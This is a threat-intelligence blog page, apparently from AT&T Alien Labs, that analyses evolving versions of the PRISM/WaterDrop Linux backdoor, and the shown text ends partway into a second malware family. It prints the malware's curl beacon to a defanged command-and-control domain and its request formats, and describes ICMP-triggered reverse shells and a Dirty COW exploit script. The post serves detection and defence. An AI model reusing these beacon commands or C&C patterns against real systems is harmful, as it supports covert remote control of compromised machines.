<!DOCTYPE html>
<html lang="en">

<head>
	

	


	

	<!--trying to figure out the canonical url issue with blogs-->
	<link rel="canonical" href="https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar" />

	<title>PRISM attacks fly under the radar | AT&T Alien Labs</title>

	

		

	<meta property="og:site_name" value="AT&T Cybersecurity" />
	<meta property="og:title" content="PRISM attacks fly under the radar" />
	<meta property="og:url" content="https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar" />
	<meta property="og:image" content="https://cdn-cybersecurity.att.com/blog-content/Blog-Images/open-graph/malware_og.jpg" />
	<meta property="og:description" content="Executive summary

AT&amp;T Alien Labs has recently discovered a cluster of Linux ELF executables that have low or zero anti-virus detections in VirusTotal (see example in figure 1), though our internal threat analysis systems have flagged them as malicious. &nbsp;Upon inspection of the samples, Alien Labs has identified them as modifications of the open-source PRISM backdoor used by multiple threat actors in various campaigns.

We have conducted further investigation of the samples and discover" />
		


	<meta charset="utf-8">

<link rel="preconnect" href="https://cdn-cybersecurity.att.com" />
<link rel="preconnect" href="https://www.att.com" />
<link rel="preconnect" href="https://www.googletagmanager.com" crossorigin />
<link rel="preconnect" href="https://cdn.vidyard.com" crossorigin />
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin />
<link rel="preconnect" href="https://www.google-analytics.com" crossorigin />
<link rel="preconnect" href="https://play.vidyard.com" crossorigin />
<link rel="preconnect" href="https://adservice.google.com" crossorigin />
<link rel="preconnect" href="https://www.facebook.com" crossorigin />
<link rel="preconnect" href="https://www.google.com" crossorigin />
<link rel="preconnect" href="https://px.ads.linkedin.com" crossorigin />




<script src="https://cdn-cybersecurity.att.com/js/v2/imports/top-bundle.min.js?v=20211221850047"></script>


<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataDefinition.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/edmDataManager.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/marketing.min.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/detm_adobe.js" as="script">
<link rel="preload" href="https://www.att.com/scripts/adobe/prod/engage.min.js" as="script">






<script src='https://www.att.com/scripts/adobe/prod/detm-container-hdr.js' data-restrictions='target' type='text/javascript'></script>


<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="ahrefs-site-verification" content="a6fa0378625f72f89c6f290c3c7559ffee326fb9232cd87fcace798afce3e30d">
<meta name="google-site-verification" content="GTQZz4AGa47UtmP64oC5BB735pkyncjtISHOcQZbIho" />
<meta name="google-site-verification" content="dOSpKecfL6OVRkgr2KvddmhD-l-g3x8vlru1kmbqa9M" />

<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/zero-width.ttf" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Bold.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Regular.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Light.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Medium.woff2" />


<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-LightItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-BoldItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-MediumItalic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Italic.woff2" />
<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/aleck/ATTAleckSans-Black.woff2" />

<link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/css/fonts/glyphicons-halflings-regular.woff2" />
<link rel="preload" as="font" type="font/ttf" crossorigin="anonymous" href="https://cdn-cybersecurity.att.com/fonts/av-icons.ttf?e81fxl" />



<link rel="preload" as="style" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20211221850047" />
<link rel="apple-touch-icon" sizes="144x144" href="https://cdn-cybersecurity.att.com/images/uploads/apple-touch-icon.png"/>
<link rel="icon" type="image/png" sizes="32x32" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico"/>
<link rel="shortcut icon" href="https://cdn-cybersecurity.att.com/images/uploads/favicon.ico">
<link rel="manifest" href="https://cdn-cybersecurity.att.com/manifest.json">

<link rel="stylesheet" href="https://cdn-cybersecurity.att.com/css/sass/main.min.css?v=20211221850047" />








<script>
	// Collects the page-load tracking fields; initAdobePageTrackingHeader() fills it in.
	var customAdobeTrackingPageLoadObj = {};
	// `ddo` is not defined in this file (presumably supplied by an externally loaded
	// script — confirm), so tracking is only initialised when it exists. The call
	// precedes the function's declaration and relies on declaration hoisting.
	if (typeof ddo !== "undefined") {
		initAdobePageTrackingHeader();
	}
	/**
	 * Pushes a 'Video_Commence' event for a Vidyard player to the `ddo` data layer.
	 * The payload is always built; it is only pushed when `ddo` is defined.
	 *
	 * @param {Object} player Object read for `uuid`, `metadata.name` and
	 *                        `metadata.length_in_seconds`.
	 */
	function adobeVideoCommenceVidyard(player) {
		// Constant fields first, then the values read from the page and the player,
		// assigned in the same key order as the event object has always had.
		var payload = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit"
		};
		payload.linkDestinationUrl = window.location.href;
		payload.mediaId = player.uuid;
		payload.mediaFriendlyName = player.metadata.name;
		payload.videoType = "VOD";
		payload.mediaPlayerName = "Vidyard";
		payload.mediaCategory = "Security";
		payload.mediaType = "Video";
		payload.mediaClass = "Video";
		payload.videoLengthTotal = player.metadata.length_in_seconds;

		var dataLayerPresent = typeof ddo !== "undefined";
		if (dataLayerPresent) {
			ddo.pushEvent('video', 'Video_Commence', payload);
		}
	}
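	/**
	 * Pushes a 'Video_Update' progress event for a Vidyard player to the `ddo`
	 * data layer. The payload is always built; it is only pushed when `ddo` is
	 * defined.
	 *
	 * @param {Object} player Object read for `uuid`, `metadata.name`,
	 *                        `metadata.length_in_seconds` and `status.currentTime`.
	 */
	function adobeVideoUpdateVidyard(player) {
		var totalSeconds = player.metadata.length_in_seconds;
		var position = player.status.currentTime;

		// A missing or zero duration made the original division yield NaN or
		// Infinity; report 0 in that case and never report more than 100 percent.
		var progressPercent = 0;
		if (totalSeconds > 0 && position >= 0) {
			progressPercent = Math.min(100, Math.ceil((position / totalSeconds) * 100));
		}

		var updateEvent = {
			successFlag: 1,
			statusCode: 0,
			errorType: "Success_Admit",
			linkDestinationUrl: window.location.href,
			mediaId: player.uuid,
			mediaFriendlyName: player.metadata.name,
			videoType: "VOD",
			mediaPlayerName: "Vidyard",
			mediaCategory: "Security",
			mediaType: "Video",
			mediaClass: "Video",
			videoLengthTotal: totalSeconds,
			videoLengthViewed: Math.floor(position),
			videoProgressPercent: progressPercent
		};
		if (typeof ddo !== "undefined") {
			ddo.pushEvent('video', 'Video_Update', updateEvent);
		}
	}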

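	/**
	 * Sets up link-click tracking and fills in the page-load tracking fields.
	 *
	 * Calls `ddo.disableAutoPageLoad()`, registers one document-level click
	 * listener that pushes a 'Link_Click' event for clicked links, and writes
	 * this page's URL path, site sub-sections and media objective into
	 * `customAdobeTrackingPageLoadObj`. The caller is expected to have checked
	 * that `ddo` exists.
	 */
	function initAdobePageTrackingHeader() {
		ddo.disableAutoPageLoad();
		document.addEventListener('click', function (event) {
			// Resolve the click to its enclosing link: a click that lands on a child
			// element (an icon <span> or <img> inside the <a>) has no href of its own
			// and was previously dropped.
			var clicked = event.target;
			var target = clicked;
			if (clicked && typeof clicked.closest === 'function') {
				target = clicked.closest('a[href]') || clicked;
			}
			if (!target || !target.href || !target.text) { return true; }
			// NOTE(review): the link text and the full destination URL (query string
			// and fragment included) are handed to ddo.pushEvent for every tracked
			// click. If any link on the site carries a token or personal data in its
			// URL, strip the query before pushing — confirm what ddo forwards.
			var linkEvent = {
				slotFriendlyName: "link-click",
				contentFriendlyName: "Link Click",
				mediaCategory: "Security"
			};
			linkEvent.linkName = target.text;
			linkEvent.linkDestinationUrl = target.href;
			// Links pointing at a '#watch-' fragment are reported as video launches.
			if (target.href.indexOf('#watch-') >= 0) {
				linkEvent.slotFriendlyName = 'watch-video';
				linkEvent.contentFriendlyName = 'Watch Video';
				linkEvent.linkName = 'Watch Video';
			}
			ddo.pushEvent("linkClick", "Link_Click", linkEvent);
		});

		// Page-specific values written into the page-load tracking object.
		customAdobeTrackingPageLoadObj['page.location.url'] = '/blogs/labs-research/prism-attacks-fly-under-the-radar';
		customAdobeTrackingPageLoadObj['page.category.siteSubSection1'] = 'blogs';
		customAdobeTrackingPageLoadObj['page.category.siteSubSection2'] = 'labs-research';
		customAdobeTrackingPageLoadObj['page.category.siteSubSection3'] = 'prism-attacks-fly-under-the-radar';
		customAdobeTrackingPageLoadObj['page.media.objective'] = 'Awareness';
	}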
</script>




	<link rel="alternate" type="application/rss+xml" title="AlienVault Open Threat Exchange Blog" href="/site/blog-all-rss" />

	<style>
	
	
	.section-breadcrumb ol {
    margin-top: 0px !important;
    margin-bottom: 10px;
	}
	
	.flexible-layout .section-breadcrumb ol li a,
	.flexible-layout .section-breadcrumb ol li{
    	color: #000;
    	font-size: 12px;
	}
	
	.section-breadcrumb .glyphicon {
    font-size: 10px;
    line-height: 10px;
    font-weight: 300;
    color: #000!important;
	}

	.blog-author-info {
		width: 70%;
		float: left;
		color: #191919;
	}

	.blog-subscribe-grid ul {
		margin-left: 0px;
		margin-bottom: 0px;
		padding-left: 0px;
	}

	.blog-subscribe-grid ul li {
		list-style-type: none;
		line-height: 20px;
	}

	.blog-subscribe-grid ul li a {
		color: #c6ced5;
		font-size: 14px;
		text-decoration: none;
	}

	.blog-subscribe-grid ul li a:hover {
		text-decoration: underline;
	}

	.blog-content-area img {
		width: 100%!important;
		height: auto!important;
	}

	.blog-promo-item {
		clear: both;
		overflow: hidden;
		margin-bottom: 30px;
	}
	.promo-block .small {
		text-transform: uppercase;
	}

	.blog-promo-item-text {
		width: 345px;
		float: left;
		max-width:100%;
	}

	.blog-promo-item p {
		margin-bottom: 0px!important;
	}






	#blog-promo-block {
		padding-top: 20px;
	}



	/*promo block and sticky classes*/

	.sticky-sidebar {
		top: 147px;
		position: -webkit-sticky; /* Safari */
		position: sticky;
	}
	     .sidebar-search {
			 margin-bottom: 30px;
		 }

         .sidebar-search .search-button {
                width: 100%;
                position: relative;
            }

            .sidebar-search .search-button input {
                padding: 0px;
                margin: 2px 0px 0px 0px;
                position: absolute;
                background: url(https://cdn-cybersecurity.att.com/images/icn-sidebar-search.png) top left no-repeat;
                background-size: 25px 25px;
                width: 25px;
                height: 25px;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                left: 10px;
                top: 6px;
             }

			.sidebar-search .search-field input {
                border: 0;
                width: 100%;
                height: 30px;
                padding-left: 50px;
				margin-top: 5px;
            }

            .sidebar-search .search-field {
                border: 1px solid #CCCCCC;
                width: 100%;
                height: 40px;
            }

            #q::placeholder {
          		color: #767676!important;
            }

            #blog-subscribe-box {
			height:auto;
            padding: 32px;
            background-image: url('https://cdn-cybersecurity.att.com/images/uploads/backgrounds/blog-email-subscribe-bkg.jpg');
            background-size: cover;
            }

            #blog-subscribe-box h2 {
            color: #fff;
            font-size:32px;
            }

			#blog-subscribe-box p {
				margin-bottom: 10px;
			}






	@media (max-width: 991px) {
            .sidebar-search .search-button input {
                padding: 0px;
                background: transparent;
                cursor: pointer;
                text-indent: -9999em;
                border: none;
                right: 5px;
                top: 5px;
                padding-left: 0px;
             }

            .sidebar-search .search-field input {
             padding-left: 15px;
             }


            }

            	@media (min-width: 768px) and (max-width: 920px){
	.blog-subscribe-grid .btn {
		border-radius: 24px;
	    font-size: 12px;
	    line-height: 18px;
	    border: none;
	    padding: 6px 36px;
	    height: 30px;
	    font-weight: 500;
	}
}


		.blog-content-area p,
		.blog-content-area ul li,
		.blog-content-area ol li{
			font-size: 16px;
			line-height: 20px;
			font-weight: 400;
		}
		.blog-content-area ul li,
		.blog-content-area ol li {
			margin-bottom: 10px;
		}
		
		.blog-content-area {
		margin-top: 30px;
		}
		
		.flexible-layout .section-breadcrumb {
		margin-bottom: 30px;
		}
		
		.blog-detail h1 {
    		color: #000; 
			background: transparent;
    		padding: 0px;
		}
		
		.blog-title-date-author-area {
			padding-bottom: 20px;
			border-bottom: #959595 1px solid;
		}
		
		.blog-body {
		padding-top: 20px;
		}
		
		
		.blog-detail .blog-categories {
    background-color: transparent;
    border-bottom: 1px solid #959595;
    border-top: 1px solid #959595;
    padding: 20px 0px 20px 0px;
    color: #000;
    margin: 30px 0px;
    font-size: 16px;
    line-height: 24px;
	font-weight: 400;
	}
	
	.blog-detail .blog-categories a {
	font-weight: 400;
	}
	
	.blog-share {
	margin-top: 60px;
	text-align: center;
	margin-bottom: 60px;
	}
	
	.blog-listing-social {
		display: block;
	}
	
	#st-1 .st-btn {
	  border-radius: 25px!important;
	  border: none;
	  cursor: pointer;
	  display: inline-block;
	  font-size: 12px;
	  height: 45px!important;
	  line-height: 40px!important;
	  margin-right: 8px;
	  padding: 0 10px;
	  position: relative;
	  text-align: center;
	  top: 0;
	  vertical-align: top;
	  white-space: nowrap;
	  margin-right: 20px!important;
	}
	
	#st-1 .st-btn > img {
	  display: inline-block;
	  height: 25px!important;
	  width: 25px!important;
	  position: relative;
	  top: 10px;
	  vertical-align: top;
	  }
	  
	  #st-1 .st-btn[data-network='email'] {
	  	background-color: #e0752d!important;
	  }
	  
	  .st-first {
	  	margin-left: 20px!important;
	  }
	
	</style>

</head>

	<body class="listing-blog-entry-id-7386">
<script src='https://www.att.com/scripts/adobe/prod/detm-container-ftr.js' type='text/javascript'></script>


		<header id="header" class="navbar navbar-fixed-top">

	<style>
@media (max-width: 543px) {
	.hide-on-mobile {
		display: none;
	}
}
</style>







	<div id="header-container" class="container-fluid">
		

		<nav class="navbar-collapse collapse" id="header-nav">
			<ul class="nav navbar-nav list-unstyled">
				<li class="nav-item has-dd solutions">
					<a id="main-nav-solutions" href="/solutions" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#solutions-dd">Solutions<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="solutions-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-see-all-solutions-mobile" href="/solutions" class="header_nav_link">See All Solutions</a></li>
							</ul>
							<div id="compliance">
								<div class="menu-header">Compliance</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/it-compliance-management">Overview</a></li>
									<li><a href="/solutions/gdpr-compliance">GDPR</a></li>
									<li><a href="/solutions/hipaa-compliance">HIPAA</a></li>
									<li><a href="/solutions/iso-27001-compliance">ISO 27001</a></li>
									<li><a href="/solutions/pci-dss-compliance">PCI DSS</a></li>
									<li><a href="/solutions/soc-2-compliance">SOC 2</a></li>
								</ul>
							</div>
							<div id="industry">
								<div class="menu-header">Industry</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/education">Education</a></li>
									<li><a href="/solutions/energy-sector-security">Energy Sector</a></li>
									<li><a href="/solutions/government">Federal</a></li>
									<li><a href="/solutions/financial-services">Financial Services</a></li>
									<li><a href="/solutions/healthcare">Healthcare</a></li>
									<li><a href="/solutions/manufacturing">Manufacturing</a></li>
									<li><a href="/partners/mssp-program">MSSPs</a></li>
									<li><a href="/solutions/retail">Retail</a></li>
								</ul>
							</div>
							<div id="environment">
								<div class="menu-header">Environment</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/5g-security-solutions">5G</a></li>
									<li><a href="/solutions/aws-security-and-compliance-management">AWS</a></li>
									<li><a href="/solutions/azure-security-and-compliance-management">Azure</a></li>
									<li><a href="/solutions/cloud-security">Cloud</a></li>
									<li><a href="/solutions/iot-and-mobility-security">IOT/Mobility</a></li>
									<li><a href="/solutions/hybrid-cloud-security">Hybrid</a></li>
									<li><a href="/solutions/network-security">Network</a></li>
									<li><a href="/solutions/remote-workforce-security">Remote Workforce</a></li>

								</ul>
							</div>
							<div id="core-capabilities">
								<div class="menu-header">Security Use Cases</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/solutions/intrusion-detection-system">Intrusion Detection</a></li>
									<li><a href="/solutions/secure-access-service-edge">Secure Access Service Edge</a></li>
									<li><a href="/solutions/secure-web-gateway">Secure Web Gateway</a></li>
									<li><a href="/solutions/siem-platform-solutions ">SIEM Platform Solutions</a></li>
									<li><a href="/solutions/extended-detection-and-response">XDR</a></li>
									<li><a href="/solutions/zero-trust-architecture">Zero Trust Architecture</a></li>

								</ul>
							</div>
						</div>
						<div class="dd-bottom visible-md visible-lg" id="view-all-solutions">
							<div class="container-fluid">
								<a href="/solutions">
									<span class="view-all-text">View All Solutions &LongRightArrow;</span>
								</a>
							</div>
						</div>
					</div>
				</li>
				<li class="nav-item has-dd partners">
					<a id="main-nav-partners" href="/partners" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#partners-dd">Partners<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="partners-dd">
						<div class="dd-multi-col container-fluid">
							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-partners-mobile" href="/partners/become-a-partner">Become a Partner</a></li>
							</ul>
							<div id="become-a-partner">
								<div class="menu-header">Become a Partner</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/partners">All Partner Programs</a></li>
									<li><a href="/partners/mssp-program">MSSP Program</a></li>
									<li><a href="/partners/resellers">Reseller Program</a></li>
									<li><a href="/partners/partner-portal/">Partner Portal Login</a></li>
								</ul>
							</div>

							<div id="find-a-partner">
								<div class="menu-header">Find a Partner</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/partners/find-partner">Find an MSSP</a></li>
									<li><a href="/partners/locator">Find a Reseller</a></li>
									<li><a href="/partners/certified-implementation-partners">Professional Services</a></li>
								</ul>
							</div>
							<div id="technology-partners">
								<div class="menu-header">Technology Partners</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/app">USM Anywhere Integrations</a></li>
									<li><a href="/partners/technology-partners">OTX Partners</a></li>
								</ul>
							</div>
						</div>
						<div class="dd-bottom visible-md visible-lg" id="view-all-partners">
							<div class="container-fluid">
								<a href="/partners/become-a-partner">
									<span class="view-all-text">Become a Partner &LongRightArrow;</span>
								</a>
							</div>
						</div>
					</div>
				</li>
				<li class="nav-item has-dd resources">
					<a id="main-nav-resources" href="/resource-center#language_en" class="dropdown-toggle" data-toggle="collapse" role="button" aria-expanded="false" data-target="#resources-dd">Resources<span class="glyphicon glyphicon-chevron-up"></span><span class="glyphicon glyphicon-chevron-down"></span></a>
					<div class="nav-dropdown collapse" id="resources-dd">
						<div class="dd-multi-col container-fluid">

							<div id="resources-menu-image" class="visible-lg">
								<img src="https://cdn-cybersecurity.att.com/images/uploads/thehub-thumbnail.jpg">
								<p>Explore The Hub, our home for all virtual experiences</p>
								<a href="https://hub.att.com/expo-hall/cybersecurity/">Explore now ⟶</a>
							</div>

							<ul class="list-unstyled sub-nav hidden-md hidden-lg">
								<li><a id="main-nav-resources-mobile" href="/resource-center#language_en">View All Resources</a></li>

							</ul>

							<div id="product-resources">
								<div class="menu-header">Product Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#content_customer-stories">Customer Stories</a></li>
									<li><a href="/resource-center#content_product-brief">Product Briefs</a></li>
									<li><a href="/resource-center#content_product-demo">Product Demos</a></li>
									<li><a href="/resource-center#content_product-review">Product Reviews</a></li>
									<li><a href="/resource-center#content_solution-brief">Solution Briefs</a></li>
									<li><a href="/resource-center#content_use-cases">Use Cases</a></li>

									<li><a id="free-trial" href="/products/usm-anywhere/free-trial">Free Trial</a></li>
								</ul>
							</div>
							<div id="security-resources">
								<div class="menu-header">Security Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#content_analyst-reports">Analyst Reports</a></li>
									<li><a href="/blogs">Blogs</a></li>
									<li><a href="/resource-center#content_ebook">eBooks</a></li>
									<li><a href="/resource-center#content_video">Videos</a></li>
									<li><a href="/resource-center#content_webcast">Webcasts</a></li>
									<li><a href="/resource-center#content_white-paper">White Papers</a></li>
									<li><a href="/resource-center#content_industry-reports">Industry Reports</a></li>
								</ul>
							</div>
							<div id="customer-resources">
								<div class="menu-header">Customer Resources</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="https://success.alienvault.com/">Success Center</a></li>
									<li><a href="/certification">Certification</a></li>
									<li><a href="/customer-success">Customer Success</a></li>
									<li><a href="/documentation">Documentation</a></li>
									<li><a href="/partners/certified-implementation-partners">Professional Services</a></li>
									<li><a href="/support">Support Overview</a></li>
									<li><a href="/training">Training</a></li>
								</ul>
							</div>
							<div id="browse-by-topic">
								<div class="menu-header">Browse by Topic</div>
								<ul class="list-unstyled sub-nav">
									<li><a href="/resource-center#category_incident-response">Incident Response</a></li>
									<li><a href="/resource-center#category_intrusion-detection">Intrusion Detection</a></li>
									<li><a href="/resource-center#category_partner-mssp-reseller">Partner: MSSP &amp; Reseller</a></li>
									<li><a href="/resource-center#category_regulatory-compliance">Regulatory Compliance</a></li>
									<li><a href="/resource-center#category_soc">Security Operations Center</a></li>
									<li><a href="/resource-center#category_siem-log-management">SIEM &amp; Log Management </a></li>
									<li><a href="/resource-center#category_threat-detection">Threat Detection</a></li>
									<li><a href="/resource-center#category_threat-intelligence">Threat Intelligence</a></li>
								</ul>
							</div>
						</div>

						<div class="dd-bottom visible-md visible-lg" id="view-all-resources">
							<div class="container-fluid">
								<a href="/resource-center#language_en">
									<span class="view-all-text">View All Resources &LongRightArrow;</span>
								</a>
							</div>
						</div>

					</div>
				</li>
				<li class="nav-item alien-labs">
					<a id="main-nav-alien-labs" href="/alien-labs" class="">AT&T Alien Labs</a>
				</li>
				<li class="nav-item visible-sm visible-xs">
					<a id="main-nav-contact" href="/contact">Contact</a>
				</li>
				<li class="nav-item support visible-sm visible-xs">
					<a id="main-nav-support" href="/support">Support</a>
				</li>

			</ul>
		</nav>

	</div>

	<div class="container-fluid visible-md visible-lg">
		
		
			<a id="main-nav-free-tools" class="header-nav-btn btn margin-bottom10" href="/pricing/request-quote">Get price</a>
		


	</div>
</header>

						




			<main class="blog-detail flexible-layout">

				<section class="full-width-block">

					<div class="container-fluid">

						<div class="row flx-container">
							<div class="col-sm-7">
								<div class="blog-content-area">
									<div class="blog-title-date-author-area">
										<h1>PRISM attacks fly under the radar</h1>
										<div class="date">August 23, 2021 &nbsp;|&nbsp; <a href="/blogs/author/fernando-dominguez">Fernando Dominguez</a></div>
									</div>
									<div class="blog-body">
										<h2>Executive summary</h2>

<p><a href="https://cybersecurity.att.com/alien-labs" target="_blank">AT&amp;T Alien Labs</a> has recently discovered a cluster of Linux ELF executables that have low or zero anti-virus detections in VirusTotal (see example in figure 1), though our internal threat analysis systems have flagged them as malicious. &nbsp;Upon inspection of the samples, Alien Labs has identified them as modifications of the open-source PRISM backdoor used by multiple threat actors in various campaigns.</p>

<p>We have conducted further investigation of the samples and discovered that several campaigns using these malicious executables have managed to remain active and under the radar for more than 3.5 years. The oldest samples Alien Labs can attribute to one of the actors date from the 8th of November, 2017.</p>

<p><img alt="PRISM in VirusTotal" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_in_VT.jpg" /></p>

<p style="text-align:center">Figure 1. PRISM sample marked as clean in VirusTotal, as captured by Alien Labs.</p>

<h2>Analysis</h2>

<p><b>WaterDrop</b></p>

<p>The WaterDrop variant is easily identifiable as it includes a function named xencrypt which performs XOR encryption with the hard-coded single-byte 0x1F key. Starting in version 7 of the WaterDrop variant, samples include the plain-text string &ldquo;WaterDropx vX started&rdquo;, where X is the integer version number. So far, we have observed versions 1, 2.2, and 3 still using the name PRISM. Versions 7, 9, and 12 are named WaterDropx.</p>

<p>It also uses the easily identifiable User Agent string &ldquo;<i>agent-waterdropx</i>&rdquo; for the HTTP-based command and control (C&amp;C) communications, and it reaches out to subdomains of the waterdropx[.]com domain.</p>

<p>While all these may seem to be fairly obvious indicators, the threat actor behind this variant has managed to maintain a zero or almost-zero detection score in VirusTotal for its samples and domains. This is most likely due to their campaigns being fairly small in size. The waterdropx[.]com domain was registered to the current owner on August 18, 2017, and as of August 10, 2021, it was still online.</p>

<p>Besides the base PRISM features, WaterDrop introduces XOR encryption for the configuration and an additional process that regularly queries the C&amp;C for commands to execute (see figure 2).</p>

<p style="text-align:center"><img alt="PRISM C&amp;C" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_CC.png" /></p>

<p style="text-align:center">Figure 2. Function to query C&amp;C for commands</p>

<p>This communication with the C&amp;C server is plain-text HTTP, and it is performed via the curl command. In all the versions Alien Labs has observed, the option -A &ldquo;agent-waterdropx&rdquo; is used, meaning the User Agent header will remain constant across versions.</p>

<p>We have also observed some samples of this variant that load a Kernel Module if the process is executed with root privileges (see figure 3).</p>

<p><img alt="Waterdrop ko" data-original="https://cdn-cybersecurity.att.com/blog-content/waterdrop_ko.jpg" /></p>

<p style="text-align:center">Figure 3. Installing the waterdrop.ko Kernel Module</p>

<h3>Version evolution</h3>

<p><strong>PRISM v1</strong></p>

<p>Alien Labs has found samples tagged as &ldquo;PRISM v1&rdquo; that we can attribute to the same threat actor with high confidence as they use the same C&amp;C domain (waterdropx[.]com). The samples also share distinctive features such as the agent-waterdropx User Agent string.</p>

<p>Compared to the public PRISM, this version introduces the creation of a child process that constantly queries the C&amp;C server for commands to execute. The initial request to the C&amp;C server is performed by the following command:</p>

<pre>
curl -A &#39;agent-waterdropx&#39; &#39;http://r.waterdropx[.]com:13858/tellmev2.x?v=1&amp;act=touch&#39;</pre>

<p>PRISM v1 does not feature any kind of obfuscation, packing, or encryption of the binaries.</p>

<p><strong>PRISM v2.2</strong></p>

<p>PRISM&nbsp; v2.2 introduces the usage of XOR encryption to obfuscate sensitive data, such as the BASH command strings used. The key is a single byte, and it is hard coded to the 0x1F value. This particular key is used across all the samples from this threat actor we observed.</p>

<p>For this version, the initial C&amp;C URI request format is:</p>

<pre>
/tellmev2.x?v=2.2&amp;act=touch</pre>

<p><strong>PRISM v3</strong></p>

<p>PRISM v3 is identical to v2.2, with one exception: clients include a bot id for identification purposes. This bot id is saved to /etc/.xid and used in the malware beacon (see figure 4).</p>

<p style="text-align:center"><img alt="PRISM bot ID" data-original="https://cdn-cybersecurity.att.com/blog-content/PRISM_bot_id.jpg" /></p>

<p style="text-align:center">Figure 4. Usage of bot id</p>

<p>The initial request format is:</p>

<pre>
/tellmev2.x?v=3&amp;act=touch&amp;xid=&lt;botid&gt;</pre>

<p><strong>Waterdrop v7</strong></p>

<p>Waterdrop v7 introduces the use of a Kernel Module that is installed using insmod if the process has root privileges. The code responsible for this task can be seen in Figure 3. We have not yet been able to retrieve the Kernel Module for analysis. Therefore, we are not able to determine the purpose of this payload.</p>

<p>The rest of the code is identical to PRISM v3, only changing the hard-coded version value.</p>

<p>As such, the initial request format is:</p>

<pre>
/tellmev2.x?v=7&amp;act=touch&amp;xid=&lt;botid&gt;</pre>

<p><strong>Waterdrop v9</strong></p>

<p>Continuing the trend of previous versions, the changes on Waterdrop v9 are minimal. The only change found in this version is that instead of using a hard-coded ICMP password, the bot uses its own bot id as ICMP password to spawn reverse shells.</p>

<p>The initial request format is:</p>

<pre>
/tellmev2.x?v=9&amp;act=touch&amp;xid=&lt;botid&gt;</pre>

<p><strong>Waterdrop v12</strong></p>

<p>Waterdrop v12 is almost identical to its predecessors, with an enhancement to the backdoor stability. As such, the initial request format is:</p>

<pre>
/tellmev2.x?v=12&amp;act=touch&amp;xid=&lt;botid&gt;</pre>

<h2>AT&amp;T Alien Labs discovers malware family &ldquo;PrismaticSuccessor&rdquo;</h2>

<p>Alien Labs began its research investigating the z0gg[.]me domain. Said domain resolves to an IP address that is shared by another twelve domains (see figure 5).</p>

<p style="text-align:center"><img alt="PRISM overlapping domains" data-original="https://cdn-cybersecurity.att.com/blog-content/prism_overlapping_domains.jpg" /></p>

<p style="text-align:center">Figure 5. Domain overlaps for target address</p>

<p>Some of the overlapping domains are known PRISM C&amp;C domains. However, z0gg[.]me is contacted by <a href="https://otx.alienvault.com/indicator/domain/z0gg.me" target="_blank">several samples</a>&nbsp;that also reach out to github.com. In particular, samples were observed contacting the &ldquo;https://github.com/lirongchun/i&rdquo; repository.</p>

<p>In this repository we can observe the following files.</p>

<ul>
	<li>Three documents containing an IP address (README.md) and a port number (README1.md and MP.md).</li>
	<li>A bash script for dirty cow (CVE-2016-5195) exploitation, named &ldquo;111.&rdquo;</li>
</ul>

<ul>
	<li>Several ELF binaries, including:
	<ul>
		<li>git: A custom malware implant</li>
		<li>ass: The open-source security tool named <a href="https://github.com/gopherst/hidemyass" target="_blank">&ldquo;hide my ass&rdquo;</a>&nbsp;compiled for the x64 architecture</li>
		<li>ass32: The open-source security tool named &ldquo;hide my ass&rdquo; compiled for the x86 architecture</li>
	</ul>
	</li>
</ul>

